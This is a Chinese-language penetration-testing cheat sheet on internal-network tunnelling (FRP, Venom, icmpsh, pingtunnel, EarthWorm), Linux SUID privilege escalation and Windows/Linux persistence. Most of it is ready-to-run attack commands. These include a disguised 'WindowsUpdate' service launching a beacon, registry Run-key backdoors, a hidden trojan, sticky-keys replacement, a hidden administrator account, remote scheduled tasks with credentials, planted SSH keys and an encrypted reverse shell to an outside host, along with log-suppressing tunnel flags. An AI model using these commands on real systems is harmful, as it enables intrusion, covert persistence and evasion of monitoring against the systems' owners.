多级代理与提权维权
目录
- 代理构建
- FRP
- 介绍
- 下载
- 配置⽂件:
- sock5代理
- Venom
- 介绍
- 下载
- 配置
- icmpsh
- 介绍
- 下载
- 配置
- pingtunnel
- 介绍
- 下载
- 配置
- EarthWorm
- 介绍
- 下载
- 使用
- 权限提升
- win权限提升
- 常⻅利⽤⼯具
- Linux权限提升
- SUID提权
- 权限维持
- win权限维持
- 系统服务后⻔
- ⾃启动⽬录
- 注册表后⻔
- 其他类似
- 隐藏⽤户
- 计划任务
- Linux权限维持
- SSH密钥
- 加密反弹shell
代理构建
FRP
介绍
frp 是⼀个专注于内⽹穿透的⾼性能的反向代理应⽤,⽀持 TCP、UDP、HTTP、HTTPS 等多种协
议。可以将内⽹服务以安全、便捷的⽅式通过具有公⽹ IP 节点的中转暴露到公⽹。其功能特性⽀持:⽀
持 TCP、KCP 以及 Websocket 等多种协议;采⽤ TCP 连接流式复⽤,在单个连接间承载更多请求,节
省连接建⽴时间;代理组间的负载均衡;端⼝复⽤,多个服务通过同⼀个服务端端⼝暴露;多个原⽣⽀持的客
户端插件(静态⽂件查看,HTTP、SOCK5 代理等)。
下载
https://github.com/fatedier/frp
配置⽂件:
https://github.com/fatedier/frp/blob/dev/conf/frps_full_example.toml
https://github.com/fatedier/frp/blob/dev/conf/frpc_full_example.toml
服务端:
[common]
bind_port = 7000
token = test@123
客户端
[common]
server_addr = 192.168.1.131
server_port = 7000
token = test@123
[socks5]
type = tcp
remote_port = 1081
plugin = socks5
plugin_user = test
plugin_passwd = 123
use_encryption = true
use_compression = true
sock5代理
安装prroxifier:
https://www.proxifier.com/
配置代理服务器和代理规则后,可访问内网系统
Venom
介绍
Venom是⼀款为渗透测试⼈员设计的使⽤Go开发的多级代理⼯具。Venom可将多个节点进⾏连接,然后
以节点为跳板,构建多级代理。渗透测试⼈员可以使⽤Venom轻松地将⽹络流量代理到多层内⽹,并轻
松地管理代理节点。其功能特性⽀持:多级socks5代理、多级端⼝转发、端⼝复⽤
(apache/mysql/…)、ssh隧道、节点间通信加密。
下载
https://github.com/Dliv3/Venom/
配置
VPS:120.10.120.X
admin_linux_x64 -lport 7000 -passwd test@123
goto 1
listen 1081
goto 2
socks 1081
主机A:192.168.3.68
agent.exe -rhost 120.10.120.X -rport 7000 -passwd test@123
主机B:192.168.3.30
agent.exe -rhost 192.168.3.68 -rport 1080 -passwd test@123
icmpsh
介绍
icmpsh是⼀个简单的反向ICMP shell⼯具。与其他类似的开源⼯具相⽐,主要优势在于它不需要管理权限即
可在⽬标机器上运⾏。
客户端只能在Windows机器运⾏,服务端可以在任何平台上运⾏。
下载
https://github.com/bdamele/icmpsh
配置
服务端:
git clone https://github.com/inquisb/icmpsh.git
#关闭icmp回复,如果要开启icmp回复,该值设置为0
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#运⾏,第⼀个IP是VPS的eth0⽹卡IP,第⼆个IP是⽬标机器出⼝的公⽹IP
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
python2 -m pip install impacket
python2 icmpsh_m.py 192.168.1.133 192.168.1.137
客户端:
-t 主机ip地址以发送ping请求。这个选项是强制性的!
-r 发送⼀个包含字符串“Test1234”的测试icmp请求,然后退出。
-d 毫秒请求之间的延迟(毫秒)
-o 毫秒响应超时(毫秒)。如果没有及时收到回复,从机将增加空⽩计数器。如果该计数器达到某个极限,从机将退出。
如果收到响应,计数器将设置回0。
-b 空⽩数量限制(退出前未答复的icmp请求)
-s 字节最⼤数据缓冲区⼤⼩(字节)
icmpsh.exe -t 192.168.1.133 -d 500 -b 30 -s 128
pingtunnel
介绍
Pingtunnel 是⼀种通过 ICMP 发送 TCP/UDP 流量的⼯具。其是最流⾏的⼀款ICMP代理⼯具,提供对
tcp/udp/sock5流量伪装成icmp流量进⾏转发的功能。需要root或者administrator/system权限。
下载
https://github.com/esrrhs/pingtunnel
配置
需要高权限
服务端:
-type server 代表开启ICMP SERVER端,等待客户端进⾏连接与通信。
-noprint 1 不在控制台打印⽇志
-nolog 1 不存储⽇志⽂件
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
./pingtunnel -type server -noprint 1 -nolog 1
客户端:
pingtunnel.exe -type client -l :4455 -s 192.168.1.133 -sock5 1 -noprint 1 -nolog 1
EarthWorm
介绍
EW 是⼀套便携式的⽹络穿透⼯具,具有 SOCKS v5服务架设和端⼝转发两⼤核⼼功能,可在复杂⽹络环境下
完成⽹络穿透。
能够以“正向”、“反向”、“多级级联”等⽅式打通⼀条⽹络隧道,直达⽹络深处。
下载
https://github.com/rootkiter/EarthWorm
使用
EW共有6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)
ssocksd:正向代理、rcsocks:流量转发、rssocks:socks5反弹
lcx_slave:端⼝绑定、lcx_listen:流量转发、lcx_tran:端⼝转发
lcx_slave 该管道⼀侧通过反弹⽅式连接代理请求⽅,另⼀侧连接代理提供主机。
lcx_tran 该管道,通过监听本地端⼝接收代理请求,并转交给代理提供主机。
lcx_listen该管道,通过监听本地端⼝接收数据,并将其转交给⽬标⽹络回连的代理提供主机。
通过组合lcx类别管道的特性,可以实现多层内⽹环境下的渗透测试。
-l 为服务启动打开⼀个端⼝。
-d 设置反弹主机地址。
-e 设置反弹端⼝。
-f 设置连接主机地址。
-g连接端⼝设置连接端⼝。
-t 设置超时的毫秒数。默认值值是1000
客户端:
ew.exe -s rssocks -d 192.168.1.131 -e 8888
服务端:
ew.exe -s rcsocks -l 1080 -e 8888
权限提升
win权限提升
常⻅利⽤⼯具
巨⻰拉冬:
https://github.com/k8gege/Aggressor
taowu:
https://github.com/pandasec888/taowu-cobalt_strike
Linux权限提升
SUID提权
查找SUID
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
命令提权
find pentestlab -exec whoami \;
vim.tiny /etc/shadow
awk 'BEGIN{system("whoami")}'
curl file:///etc/shadow
less /etc/passwd
nmap --interactive
权限维持
win权限维持
系统服务后⻔
注册服务
sc create "WindowsUpdate" binpath= "cmd /c start "C:\Users\Administrator\De
sktop\beacon.exe""&&sc config "WindowsUpdate" start= auto&&net start Window
sUpdate
查询服务
sc query WindowsUpdate
删除服务
sc delete WindowsUpdate
⾃启动⽬录
将⽊⻢样本放⼊系统的启动⽬录当中 ,可针对重启主机 。
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
注册表后⻔
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /
v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnc
e" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunSer
vices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunSer
vicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe”
⼿⼯加⽩,然后利⽤bat命令,隐藏⽊⻢
attrib +s +h C:\Users\pentestlab\pentestlab.exe
SHIFT后⻔
将C:windows/system32/sethc.exe替换为cmd.exe。
登陆界⾯连按5下Shift键,可调出cmd.exe。
其他类似
屏幕键盘:C:\Windows\System32\osk.exe
放⼤镜:C:\Windows\System32\Magnify.exe
旁⽩:C:\Windows\System32\Narrator.exe
显示切换器 C:\Windows\System32\DisplaySwitch.exe
应⽤切换器:C:\Windows\System32\AtBroker.exe
隐藏⽤户
net user test$ P@ssw0rd123 /add
net localgroup administrators test$ /add
net localgroup administrators
计划任务
(at<2012):
at \\ 191.168.3.144 16:52 c:\transfer.exe
(schtasks>=2012) :
创建任务
shell schtasks /create /s 192.168.3.144 /ru system /u dbadmin /p admin!@#4
5 /tn transfer /sc DAILY /tr c:\transfer.exe /f
运⾏任务
shell schtasks /run /s 192.168.3.144 /u dbadmin /p admin!@#45 /tn transfer
/i
删除任务
schtasks /delete /s 192.168.3.144 /u dbadmin /p admin!@#45 /tn transfer /f
Linux权限维持
SSH密钥
⽣成公私钥:
ssh -keygen -b 4096 -t rsa
上传公钥到~/.ssh/id_rsa.pub
ssh-copy-id -i ~/.ssh/id_rsa.pub root@192.168.227.136
免密登录
ssh -p 22 root@192.168.227.136
加密反弹shell
⽣成证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
-nodes
服务端监听
nc -lvp 443
客户端反弹
载⼊证书,再反弹
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
mkfifo /tmp/z; /bin/bash -i < /tmp/z2>&1| openssl s_client -quiet -connect
x.x.x.x:443 > /tmp/z; rm -rf /tmp/z